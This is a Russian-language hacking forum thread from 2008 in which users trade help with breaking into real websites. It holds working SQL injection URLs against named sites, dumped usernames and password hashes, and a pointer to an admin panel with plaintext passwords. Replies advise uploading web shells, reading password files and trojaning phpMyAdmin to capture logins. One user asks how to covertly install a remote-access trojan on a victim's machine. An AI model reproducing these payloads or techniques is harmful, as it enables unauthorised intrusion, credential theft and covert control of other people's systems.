Просмотр полной версии : Ваши вопросы по уязвимостям.
тебя редиректит.... скуля там.. да вроде единственная возможность на этом сайте подставить ковычку
А почему он тогда редиректит,если я передаю ссылку
http://www.mutu.ro/ro_guestbook.php?st=10
Сканер отнёс это к еррорам,любые действия редиректятся).XSS зато куча )
Так,мошь кто ломал Плеск,поможет.
Программа: Plesk 8.1.1 для Windows и более ранние версии.
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленном пользователю получить доступ к важным данным на системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "locale_id" в сценариях login.php3, login_up.php3 и top.php3. Удаленный пользователь может с помощью специально сформированного запроса, содержащего символы обхода каталога, просмотреть содержимое произвольных файлов на системе
Вот такой вопрос... Версия сайта попадает под это описание,но не передаётся там параметр locale_id.Что тогда делать ? Дыра идёт мимо меня?))
Вот пример пост формочки:
<form name="form2" action="/login_up.php3" method="post" onSubmit="return login_oC(document.forms[0], document.forms[1])">
<table class="formFields" cellspacing="0" width="100%">
<tr>
<td class="name"><label for="passwd"> Password</label></td>
<td><input type="password" name="passwd" id="passwd" size="25" maxlength="14" tabindex="2"></td>
</tr>
<tr>
<td class="name"><label for="fid-locale">Interface language</label></td>
<td><select name="login_locale" id="fid-login_locale" onChange="locale_oC(document.forms[0], document.forms[1])"> <option value='default' SELECTED>User default</option>
<option value='en-US'>ENGLISH (United States)</option>
</select>
</td>
</tr>
</table>
<input type="hidden" name="login_name" value="">
</form>
Может я слепой,но всё же...
Велемир, в html-исходнике ты не найдешь ничего. То что ты скинул - факт работы пхп и шаблонов. Дай сайт в личку - может помогу :)
А если ты хочешь увидеть почему в этом месте уязвимость - тебе нужны исходники.
Так ведь параметры должны передаваться скрипту через хтмл форму.Исходник полюбому не достать - прав нету,если ты про исходники того сервера ). Ну а паблик и так понятно...
immortal16
27.07.2008, 13:22
подскажите плиз нубу т.е. мне :
я тут одним трояном заинтересовался(radmin 3.2) faq и все прилагающееся прочитал но понял меньше половины разъясните плиз:
1. там два инсталера было один viewer второй server. так сервер у ся распаковывать или у жертвы.если у ся то жертве скидывать r_server.exe AdmDll.dll raddrv.dll правильно?2.как етот сервер настроить?
3.пасс где найти смотрел в топиках так они все нерабочие мож есть программа какая (тада как ей пользоваться!
4.объясните как инсталером объединить 2 программы чтоб жертва установила и софт(желаемый) и сервер ?
5.как и куда скрипты прописывать чтоб у жертвы не логилась прога и чтоб из треи исчезла!?ах да и чтоб неспрашивала жертвы у разрешение на взлом?
поиск на ачате скрытый радмин тебе всё обьяснит
Есть такая ситуация при инклудах и sql-inj, когда пишешь например
?file=./.
?id=-1+select+1,2,load_file('/etc/.'),4/*
и на экран выводится содержимое каталога. Но это срабатывает не всегда, вот я и хотел бы знать, в каких случаях срабатывает.
От чего это зависит? От ОСи, файловой сис-мы или ещё от чего-то?
geezer.code
27.07.2008, 18:33
o3,14um
во-первых от того есть ли этот каталог.
во-вторых как подмножество первого от ОСи.
в-третих от прав доступа с которыми работает мускул.
есть ищо много
в-****
BlackSun
27.07.2008, 18:41
Есть такая ситуация при инклудах и sql-inj, когда пишешь например
?file=./.
?id=-1+select+1,2,load_file('/etc/.'),4/*
и на экран выводится содержимое каталога. Но это срабатывает не всегда, вот я и хотел бы знать, в каких случаях срабатывает.
От чего это зависит? От ОСи, файловой сис-мы или ещё от чего-то?
У текушего mysql-юзера прав не хватает
спасибо за ответы. Но думаю что ещё не помешао бы пару советов:
Когда есть возможность читать файлы на сервере через мускул инъекцию, но заливать возможности нет (ковычки экранизируются), что посоветуете прочесть, для того чтобы залить шелл? Конфиги читал - на руках пароли от мускул сервера, но коннект только локальный. К ФТП пароли не подходят (то бишь мот и подходят, я просто адрес фтп не нашёл). По каталогам рыться нет возможности - можно только если знаешь где именно файл лежит или подбирать путь наугад, но у меня на руках путь до папки веб-сервера с сайтом. /etc/passwd - никакой инфы не дал (не прокатило логин:логин)
админку не нашёл, даже от форума
тяжёлая ситуация, правад?))
BlackSun
27.07.2008, 19:17
спасибо за ответы. Но думаю что ещё не помешао бы пару советов:
Когда есть возможность читать файлы на сервере через мускул инъекцию, но заливать возможности нет (ковычки экранизируются), что посоветуете прочесть, для того чтобы залить шелл? Конфиги читал - на руках пароли от мускул сервера, но коннект только локальный. К ФТП пароли не подходят (то бишь мот и подходят, я просто адрес фтп не нашёл). По каталогам рыться нет возможности - можно только если знаешь где именно файл лежит или подбирать путь наугад, но у меня на руках путь до папки веб-сервера с сайтом. /etc/passwd - никакой инфы не дал (не прокатило логин:логин)
админку не нашёл, даже от форума
тяжёлая ситуация, правад?))
Вариантов много ..
- сделай select пароля рута из таблицы mysql.user (если прав хватит), потом нарой phpmyadmin и через него залей шелл
- если прав хватит прочитай /etc/shadow или /etc/master.passwd
- если есть одминка, попробуй через нее, обычно одминки не славятся зашитой
- заюзай http://2ip.ru/server.php, прочитай конфиги соседних сайтов, попробуй залить шелл через них
- если есть cPanel или DirectAdmin или тп, прочитай их конфиги ..
Все зависит от прав .. импровизируй)
geezer.code
27.07.2008, 19:19
o3,14um
адрес фтп - совпадает с ip. нужно только знать логин.
- сделай select пароля рута из таблицы mysql.user (если прав хватит), потом нарой phpmyadmin и через него залей шелл
я писал:
на руках пароли от мускул сервера, но коннект только локальный
если есть одминка, попробуй через нее, обычно одминки не славятся зашитой
опять таки я писал:
админку не нашёл, даже от форума
- если прав хватит прочитай /etc/shadow или /etc/master.passwd
- заюзай http://2ip.ru/server.php, прочитай конфиги соседних сайтов, попробуй залить шелл через них
- если есть cPanel или DirectAdmin или тп, прочитай их конфиги ..
шэдоу и мастер не прочитать, сайт там 1, все конфиги что нашёл - прочёл, но нифига кроме паролей от БД, которые у меня уже есть не нашёл и cPanel или DirectAdmin там нет.
Все зависит от прав .. импровизируй)
вот когда моя фантазия иссякает, я и обращаюсь за помощью))
2geezer.code, там походу ФТП-сервера вообще нет или висит на другом порту. Впринципе и не думаю. что если он там есть, то пароль совпадёт
BlackSun
27.07.2008, 19:33
Попробуй к ssh по мускульному паролю или к удаленному рабочему приконектится
есть ли какие-либо онлайн-сервисы по сканированию сайта?
BlackSun
27.07.2008, 20:40
есть ли какие-либо онлайн-сервисы по сканированию сайта?
http://www.google.com/search?client=opera&rls=ru&q=%D0%9E%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD+%D1%83%D1%8 2%D0%B8%D0%BB%D0%B8%D1%82%D1%8B&sourceid=opera&ie=utf-8&oe=utf-8
есть ли какие-либо онлайн-сервисы по сканированию сайта?
подойдет?
http://madnet.name/tools/madss/
Кто-нить знает поля в таблице phpmyadmin.pma_table_info ?
И ещё какие-нибудь полезные таблички оттуда с полями : )
http://www.fm.gov.lv/index.php?id=8-8=5+and+ascii(substring((select+password+from+user s+limit+1,1),1,1))=100/*
Почему не выходит посимвольный перебор ? оООО
Кто-нить знает поля в таблице phpmyadmin.pma_table_info ?
И ещё какие-нибудь полезные таблички оттуда с полями : )
нету полезных,я специально на локалхосте посмотрел,и не нашел =\
The_XOPb
28.07.2008, 08:54
Мир вам, бывалые хакеры! Я вот только начал постигать эту науку. Почитал кой-чё на вашем форуме, поискал в инете дырявые сайтики... Нашёл кой-чё! И теперь у меня вот такой вопрос по XSS-уязвимостям: если строка поиска на сайте пропускает в себя такое <script>alert("boo");</script> и выполняет это на странице результатов поиска, то могу ли я как-то дефейснуть сайт через это? или украсть куки других юзеров этого ресурса? или подключить к сайту свой js-файл?
С уважением, ламер!
MaSTeR GэN
28.07.2008, 11:07
2The_XOPb если не фильтруеться стока поиска это пассивная xss сделать практически с ней не чего нельзя !ток попробовать подкинуть пользователелю и украсть куки что мало вероятно!
http://forum.antichat.ru/thread20140.html
The_XOPb
28.07.2008, 11:16
Спасибо MaSTeR GэN! Но, великое братство мегахакеров, продолжу вас мучить тупыми вопросами! Есть ресурс, у которого при пустом значении поиска выводится страница со следующим сообщением "Template->loadfile(): No file specified for handle search_block". Это можно для какого-нить хулиганства использовать?
С уважением, пока всё ещё ламер!
Bonnie and Clyde
28.07.2008, 11:25
Спасибо MaSTeR GэN! Но, великое братство мегахакеров, продолжу вас мучить тупыми вопросами! Есть ресурс, у которого при пустом значении поиска выводится страница со следующим сообщением "Template->loadfile(): No file specified for handle search_block". Это можно для какого-нить хулиганства использовать?
С уважением, пока всё ещё ламер!
http://php.ru/manual/function.sdo-das-xml-loadfile.html
если это поле загружает PDF документы, тогда читай это: http://www.xakep.ru/magazine/xa/102/054/1.asp
или же вероятно это просто ошибка кода: http://php.ru/forum/viewtopic.php?t=1372&start=150&sid=1738c1dccca7303763afa8c7d7dcea90
Ну и уже если все три варианта не сработали, тогда это тебе точно поможет: http://www.webmasterworld.com/forum88/7281.htm
The_XOPb
28.07.2008, 12:28
Спасибо тебе Bonnie! И тебе Clyde! :) Будет повод подучить английский!
big_BRAT
28.07.2008, 12:56
http://www.lutherie-guitare.org что за движек? на самописный вроде не похож....
_http://www.lutherie-guitare.org/Main.php?do=Detailler&submit=detaillerObjet&objet=Doc&numero=260'--
вроде как и значение не фильтруется? но запрос такого вида проходит... _http://www.lutherie-guitare.org/Main.php?do=Detailler&submit=detaillerObjet&objet=Doc&numero=260sdfsdf
уже замаялся, кто поможет, нуна получить админа
нету полезных,я специально на локалхосте посмотрел,и не нашел =\
Ужась.... =_____________=
Провожу иньекцию по этой ссылке
https://forum.antichat.ru/thread35599.html
Получается следующее:
http://www.avia.ru/pr/?id=-1'+order+by+1--
Warning: pg_exec() query failed: ERROR: invalid input syntax for integer: "-1' order by 1--" in /var/www/www.avia.ru/htdocs/pr/index.php on line 13
Order by запрещен??
Ershik
а там есть скуль? ругается на неверный даныные int
А смысл?
Warning: pg_exec() query failed: ERROR: invalid input syntax for integer: "-1 order by 1--" in /var/www/www.avia.ru/htdocs/pr/index.php on line 13
Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /var/www/www.avia.ru/htdocs/pr/index.php on line 14
З.Ы. Я тоже, по статье делаю.
ВСем Прюэт!
Есть такая уязвимость в MKportale 1.1:
_http://www.securityfocus.com/archive/1/485035
: Discovery by:
Sw33t h4cK3r
: POWERED BY
: MKPortal M1.1
Exploit :
http://Example.com
index.php?ind=gallery&op=foto_show&ida=(sql)
Только я не понимаю,что дает это инъекция,никак не получаеться раскрутить...Прошу помощи :-)
~!DoK_tOR!~
29.07.2008, 02:38
скачай исходники двига и помотри таблички и колонки )
скуль инекцыя
для начала узнай версию мускула
скачай исходники двига и помотри таблички и колонки )
Так это не проблема,только вот раскрутить не получаеться =(
MaSTeR GэN
29.07.2008, 10:34
2DDoSька так я не понял в чем заключаеться вопрос ? дай линк то хотя бы что можно в ПМ просто по описанию эт обычноая скуль иньекция ;)
2Ershik там нету иньекции входяшие значения приводяться к integer о чем и говорит ошибка ;)
Bonnie and Clyde
29.07.2008, 15:26
ВСем Прюэт!
Есть такая уязвимость в MKportale 1.1:
_http://www.securityfocus.com/archive/1/485035
: Discovery by:
Sw33t h4cK3r
: POWERED BY
: MKPortal M1.1
Exploit :
http://Example.com
index.php?ind=gallery&op=foto_show&ida=(sql)
Только я не понимаю,что дает это инъекция,никак не получаеться раскрутить...Прошу помощи :-)
там blin sql-inj
http://milw0rm.com/exploits/4179
как залить шелл через скуль инжект? знаю путь где лежит сайт, с помощью подзапросов (substring((select+user())..... вывел чудесное слово Root, короче все это не важно, меня интересует как залить шелл через скулю ?
aka PSIH
29.07.2008, 15:33
s_p_a_m
_https://forum.antichat.net/showthread.php?t=34338
s_p_a_m
если экранизируются ковыки, то скуль-запросами не зальёшь. Зато можешь поковырять скрипты, что стоят на сервере, вытянуть пароли из БД, расшифровать, если потребуется и через админку попробовать залить шелл ;-)
s_p_a_m
_https://forum.antichat.net/showthread.php?t=34338
выводимых полей нет
s_p_a_m
если экранизируются ковыки, то скуль-запросами не зальёшь. Зато можешь поковырять скрипты, что стоят на сервере, вытянуть пароли из БД, расшифровать, если потребуется и через админку попробовать залить шелл ;-)
каким образом вытянуть пароли ? выводимых полей нет? поделись знаниями, так как я такой скулей первый раз работаю :)
зайди в раздел СТАТЬИ данного форума ;-)
MaSTeR GэN
29.07.2008, 21:15
бред зачем выводимые поля при залитии шелла ??? тебе нужно знать имя хотя бы одной таблицы и установочную директорию если есть filepriv насколь я понял у тебя root тогда лей спокойно через into outfile !
можно и не знать ни одного имени таблы и лить спокойно можно если ковычки не экранизируются
MaSTeR GэN
30.07.2008, 11:39
Хм не чего не пойму )
http://www.laptopshowcase.co.uk/downloads.php?id=1 and 1=1
http://www.laptopshowcase.co.uk/downloads.php?id=1 and substring(version(),1,1)=4
запросы такого рода проходят а что то типа
http://www.laptopshowcase.co.uk/downloads.php?id=1 order by 1
выдает ошибку типа:
right syntax to use near 'GROUP BY downloads.id
если завершить запрос "--" or "*/" то ошибка такого рода :
"Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause"
подскажите в чем проблема ?
aka PSIH
30.07.2008, 11:45
MaSTeR GэN
http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+1/*
http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())/*
laptops_main@localhost:4.0.23-standard:laptops_mai
вывод в title
Ладно поф с этим сайтом.А на лаптопы эти забей,их уже тыща человек ломала)
очень странный ответ в MS Access:
http://xxx.com/Detail.asp?ad_id=2968+order+by+1
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Missing semicolon ( ; ) at end of SQL statement.
/adDetail.asp, line 258
кто сталкивался с подобным и что это?
prescott
31.07.2008, 01:28
Провожу иньекцию по этой ссылке
https://forum.antichat.ru/thread35599.html
Получается следующее:
http://www.avia.ru/pr/?id=-1'+order+by+1--
Order by запрещен??
вероятнее всего твой запрос проходит, а на следующем скул уже не прокатывает. И такой -- комментарий на будущее должен с обоих сторон обрамлятся пробелом +by+1+--+, хотя на некоторых серваках вроде и так пашет...
prescott
31.07.2008, 01:46
Хм не чего не пойму )
http://www.laptopshowcase.co.uk/downloads.php?id=1 and 1=1
http://www.laptopshowcase.co.uk/downloads.php?id=1 and substring(version(),1,1)=4
запросы такого рода проходят а что то типа
http://www.laptopshowcase.co.uk/downloads.php?id=1 order by 1
выдает ошибку типа:
right syntax to use near 'GROUP BY downloads.id
если завершить запрос "--" or "*/" то ошибка такого рода :
"Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause"
подскажите в чем проблема ?
В запросе используется одна из функций (MIN(),MAX(),COUNT().. При их использовании обязательна группировка по одному из полей, а ты обрезаешь завершающий групбай комментарием...
http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+1/* вот так надо
Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается :D
вот сайт про медведа......
http://viperson.ru/main.php?arcnews=1+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30/*&M_sel=200808
там уязвимых переменных много.. но неодну не вышло разкрутить.. толи я спать хочу толи еще чтот )
http://viperson.ru/main.php?sort=9999999+union+select+1,2,3,4,5,6,7,8 ,9,10,11/*
кароч. смотрите...
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
+1
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается"
совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд.
а ответ: пример, ссыль
http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3
оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
Если админ не хранит их в текстовике memory.txt (:D), то только надеяца, что пассы от бд или ещё чего-нибудь совпадут с фтп.
Подскажите какие таблицы можно использовать еще, если при таком запросе:
http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schem a.tables--
вылазит:
SELECT command denied to user: 'user@host' for table 'table' ?
The matrix
02.08.2008, 12:12
Подскажите какие таблицы можно использовать еще, если при таком запросе:
http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schem a.tables--
вылазит:
SELECT command denied to user: 'user@host' for table 'table' ?
Использовать те таблицы, к которым имеет доступ юзер под которым ты подключен к бд ;)
к INFORMATION_SCHEMA доступа нет пробуй вручную перебирать или посредством скриптов.
satana8920
02.08.2008, 14:52
народ подскажите вот с этим
http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/*
вроде полей по order by 8 а так че то ошибку выдает че за х?
и таких блин куча обьясните раз и на всегда
Jokester
02.08.2008, 15:22
народ подскажите вот с этим
http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/*
вроде полей по order by 8 а так че то ошибку выдает че за х?
и таких блин куча обьясните раз и на всегда
Объясняю раз и на всегда: :D
В запросе скорее всего 2 селекта
почитай это :
http://forum.antichat.ru/threadnav43966-3-10.html
satana8920
02.08.2008, 15:30
я так понял мне надо подзапросы использовать?если да то как это осуществить?
я так понял мне надо подзапросы использовать?если да то как это осуществить?
Прочитать про посимвольный перебор, а так же про подзапросы (да и про многое другое) можно здесь: https://forum.antichat.ru/threadnav43966-1-10.html
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=1 - запрос выполняется правильно, результат запроса не меняется
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=2 - запрос выполняется не правильно, результат запроса меняется
Таким образом посимвольно выводи нужную тебе информацию (для начала нужно вывести версию, т.к. подзапросы доступны начиная с версии 4.1), только делать это руками не рационально, лучше скриптом или программой:
version(): 4.1.11-Debian_4sarge7
user(): db35109_rooted@10.1.3.24
database(): db35109_x1
Т.к. версия БД => 4.1 то использовать подзапросы можно:
http://www.irintech.com/x1/blogarchive.php?id=764+and+(select+1)=1 - это уже пример подзапроса
Дальше тебе нужно брутить таблицы, могу попробывать если хочешь (т.к. я сейчас занимаюсь тестированием своего скрипта, который как раз работает со слепыми инъекциями), если найдутся какие либо (займет поиск часа 2-3), то добавлю инфу в этот же пост.
А вот и найденые таблицы:
Имена таблиц взяты из файла: lib_and_data/grey_table_name.txt
Всего: 1559 имён таблиц
Найдено таблиц: 2
admin
user
Колонки к таблице admin:
Подбор имён колонок к таблице: admin
Найдено колонок: 1
id
Колонки к таблице user:
Подбор имён колонок к таблице: user
Найдено колонок: 4
id
username
email
password
Жаль что колонки к таблице с админами не сбрутились, надо будет мне состряпать словарь с именами колонок, а то того что юзаю я пока не хватает.
Вывел данные из таблиц, может пригодится:
Вывод результата запроса: (select id from admin limit 0,1)
length((select id from admin limit 0,1)): 1
(select id from admin limit 0,1): 1
Вывод результата запроса: (select concat(id,char(58),email,char(58),username,char(58 ),password) from user limit 0,1)
length((select concat(id,char(58),email,char(58),username,char(58 ),password) from user limit 0,1)): 45
(select concat(id,char(58),email,char(58),username,char(58 ),password) from user limit 0,1): 35:jean:jean:3308150413ecf9da841f9a9dd90309ba
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается"
совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд.
а ответ: пример, ссыль
http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3
оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд
а хера его обходить. Ведь меняется только текст в урле.
Вот тебе Яркий пример:
https://forum.antichat.ru/showthread.php?t=27498
и
https://forum.antichat.ru/thread27498.html
одно и тоже (обязательно прочти статью по этим линкам)
Единственное, что сложно подбирать правильный урл. Другого способа, отличного от подбора не знаю. Впринципе особо не интересовался. Погугли, может найдёшь что-нить. А если найдёшь, то скинь в личку ссылок =)
привет. я только учусь =)
нашол SQL на http://www.aquarell-sts.ru/products/index.php?id=50'
подобрал количество: http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+1,2,3/* - вот, вроде, 3 =)
также могу подставить вместо 2 например user(), database(), etc..
НО пробую так:
http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+mysql .user/*
в ответ:
SELECT command denied to user 'a2513_aquarell'@'lbarbero-15.m-10.ru' for table 'user'
типа команда SELECT для юзера a2513_aquarell ЗАпрещена =(
что мне делать? =*)
тебе запрещён селект из таблы юзер .. тк кк версия 4ая - ищи другие таблы ..
таблици искать перебором?
http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+table/*
и table перебереть брутом?
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)
Ded MustD!e
04.08.2008, 00:21
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,concat(login,0x3a,pwd),333+from +users/*
Пароли в открытом виде, админка:
http://www.aquarell-sts.ru/admin/
Ded MustD!e:
СПАСИБО!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
а если не секрет мож мне россказать как ти узнал про login и pwd?
eLWAux
он их просто подобрал (угадал).
http://www.mbc.edu - сайт
/news/r_detail.asp?id=2087+union+select+1,2,3,4,5,6,7/* - точное кол-во.
Но вывод куда-то пропал :confused: . Нигде нету.
Это blind injection ?
лови ))
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*
======================
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,concat_ws(0x3a,username,pword_ hash),3,4,5,6,7+from+user/*
что за тип хеша - не знаю :D
можт кодировка !?
лови ))
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*
Ух какая в минусе сила. Спасибо! :)
Угу, чет хэш загадочный. :eek: ... Пойду гуглить.
Пытаюсь сделать
script.php?id=199'union+select+1,2,user(),4,5,6,7, 8,9,10/*
а вылазит:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
SELECT *, UNIX_TIMESTAMP(`itemdate`) AS `unix_time` FROM `umsec_news_items` WHERE `id`='199'union select 1,2,user(),4,5,6,7,8,9,10/*'
Ладно, кодирую в hex
script.php?id=-113'+union+select+1,2,0x76657273696f6e2829,4,5,6,7 ,8,9,10/*
А там где должна быть инфа о версии показывает тупо слово version()
Можно где-нить об етом почитать или что-нить узнать подробнее?
aka PSIH
04.08.2008, 07:20
USAkid
aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),vers ion(),database()),0x71),0x71)
Можно где-нить об етом почитать или что-нить узнать подробнее?
про это уже миллион раз писали на ачате..
USAkid
script.php?id=199'union+select+1,2,user(),4,5,6,7, 8,9,10/*
или использовать конструкцию unhex(hex())
script.php?id=199'union+select+1,2,unhex(hex(user( ))),4,5,6,7,8,9,10/*
кстати намного удобнее чем aes_decrypt(aes_encrypt,0x71),0x71)
Зачем в Hex кодировать? У вас проблемы с кодировкой.
Попробуйте вот это:
aes_decrypt(aes_encrypt(любое твоё слово,0x71),0x71)
Или в convert(version() using latin1)
проще всего имхо cast(version()+as+binary)
имею доступ к панели управления http://www.neo-nvk.ru/newsphp/newsok/admin.php
а на фтп немогу приконектится. конектится вроде нормально... пароль и логин признаёт.. а потом срывается
Response: 550 Permission denied.
Error: Could not retrieve directory listing
aka PSIH
04.08.2008, 13:32
*eXe*
по IP блокирует ;)
aka PSIH
а разблокируется только с админки?
омг, это с каких пор штацес блокирует конект по фтп? aka PSIH, вы бредите
aka PSIH
04.08.2008, 14:05
мля, сорри сорри )))
прочитал только первую и последние строчки...
тогда
550
Запрошенная функция не реализована, файл не доступен, например, не найден
/me стыдно :(
black-list.gu.ma
что можете сказать?*??
вроде что то опасное
BlackSun
04.08.2008, 16:46
black-list.gu.ma
что можете сказать?*??
вроде что то опасное
Найденная мной одна из кссок на ксакепе, заюзанная челом с ником Tray)
где phpmyadmin хранит пароли?
где phpmyadmin хранит пароли?
Наиболее частые случаи (везде по разному):
1. Базовая авторизация на директории с ПМА (т.е. информация о БД прописана в файл), а за доступ к директории отвечают файлы .htaccess и .htpasswd
2. Данные для подключения к БД нигде не хранятся, а вводятся ползователем, т.е. логин который он просит ввести это логин пользователя БД, а пароль соответтвенно пароль указанного пользователя БД.
3. Вроде ещё в самой БД может хранится.
Grey
понятно.. в моем случаи логин и пасс пользователя БД есть но нехватает прав чтобы просмотреть mysql.user, хотел узнать пасс рута.. я имею доступ к папке phpmyadmin через шелл.. просморев файлы нече не нашел... спасибо....
3. Вроде ещё в самой БД может хранится.
Так в mysql.user и храняться пассы
4.Пассы хроняться в куках ;))
DDoSька
да...... но прав чтобы просмотреть нету.
и еще как я знаю.. что вся база данных mysql хранится в файлах на сервере?
1 попробуй пароли что нарыл к фтп
2 если есть права - можешь протроянить пхпмуфдмин(чтобы введённые пассы сохранялись в лог)
омг, это с каких пор штацес блокирует конект по фтп? aka PSIH, вы бредите
я заходил через ай пи сервака
Для доступа по FTP используйте в качестве hostname (адрес хоста) IP сервера.
Информация аккаунта:
Домен: neo-nvk.ru
IP сервера*: 77.222.40.12
Status: Connecting to 77.222.40.12 ...
Status: Connected with 77.222.40.12. Waiting for welcome message...
Response: 220 (vsFTPd 1.2.2)
Command: USER ********
Response: 331 Please specify the password.
Command: PASS *********
Response: 230 Login successful.
Command: FEAT
Response: 211-Features:
Response: MDTM
Response: REST STREAM
Response: SIZE
Response: 211 End
Command: SYST
Response: 215 UNIX Type: L8
Status: Connected
Status: Retrieving directory listing...
Command: PWD
Response: 257 "/"
Command: TYPE A
Response: 200 Switching to ASCII mode.
Command: PASV
Response: 550 Permission denied.
Error: Could not retrieve directory listing
Кто может сказать,где лежат файлы .htpasswd,.htaccess и .bash_history ?И ещё: для чтения нужны права рута от бд или системы ? А также есть ещё одна вещь,которой я никак не пойму: Смысл делать имя сервера совападающее с алиасом (вида www5.site.com),если сам сайт - www.site.com.Непонятно...Дело в том,что по алиасу такого сайта по хттр протоколу не существует,а site.com есть.Пинги доходят до обоих(Один из них виртуальный хостинг,а другой хостящийся на нём сайт).Анадиз показал,что они находятся в одной подсети на разных машинах.Путь до логов на вирт. хостинге и на хостящемся на нём чсайте отличаются(вполне логично), но одни существуют,а другие - нет.Как такое объяснить ?
Велемир, .htpasswd и .htaccess могут лежать где угодно. Но чаще всего .htpasswd лежит или в корне или рядом с .htaccess, который, в свою очередь лежит, чаще всего, в папке, которая им защищена, или тоже в корне :) Права бд тут не при чем. А права системы нужны в зависимости от того какой уровень доступа поставил админ.
Последний вопрос не понял о_О
Кто может сказать,где лежат файлы .htpasswd,.htaccess и .bash_history ?И ещё: для чтения нужны права рута от бд или системы ?
ну htpasswd и htaccess лежать могут где угодно в корне сайта
могут в самом корне, могут например в www.site.com/admin/, если например админка защищена щтацесом. Права на чтении будет всегда для пользователя от которого работает апач, однако прочитать их обычным запросом браузера типа www.site.com/.htaccess не получиться. Баш хистори обычно лежит в папке юзера, если например сайт в папке /home/someuser/httpdocs/ , то баш хистори в /home/someuser/.bash_history, прав на чтение как правило нет.
Если я тебя правильно понял =()
Насчёт последнего,на виртуальном хосте путь до логов один,а на хостинге - другой.Лог файлов виртуального хоста есть,а системы,на которой хостится этот сайт - нету.Смотрел ErrorLog
Ещё вопрос: Почему некоторые поля таблицы не отображаются,хотя присутствуют ?
Велемир, они могут быть пустыми
Велемир, они могут быть пустыми
Эм...При проверке на NULL взял поле,которое возвращает значение.is+null - не высвечивается ничего.is+not+null - высвечивается содержимое поля,тобишь,если не ноль, данные выводятся,а если ноль - нет?Или писаться NULL должно ? Просто результаты что с *якобы* пустым полем, и с полем со значением - одинаковые.
Велемир, я плохой телепат. Напиши полностью запросы которые ты проводишь и ответы на них. Извини, но пишешь ты непонятно)
http://www.rtr.spb.ru/People_line/viewmsg.asp?ID=-17775+union+select+1,2,3,4,user,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+where+user+is+not+null--&FID=17452
Не ноль - выводит данные.
http://www.rtr.spb.ru/People_line/viewmsg.asp?ID=-17775+union+select+1,2,3,4,user,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+where+user+is+null--&FID=17452
Ноль - не выводит).Так получается ?
Jokester
06.08.2008, 12:38
Велемир
Ты конечно величайший экспериментатор современности, но тебе самому не надоело , что 90% твоих постов просто никто не понимает, а 70% удаляют модераторы?
Прочитай хоть одну книгу по интересующей тебя теме, и все твои вопросы отпадут.
По поводу последнего поста вот онлайн справочник по базам данных:
http://www.sql.ru/docs/
Умоляю тебя, прочитай хоть что-нибудь!!!
нашел вот такой сайт
http://www.elementar.de/cms/index.php?id=487&L=-1231314+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,8 0,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95/*
попробовал подставить version() в каждое из 95 полей :confused:, как вообще лучше искать то поле (если их например больше 50) куда подставлять нужный код?
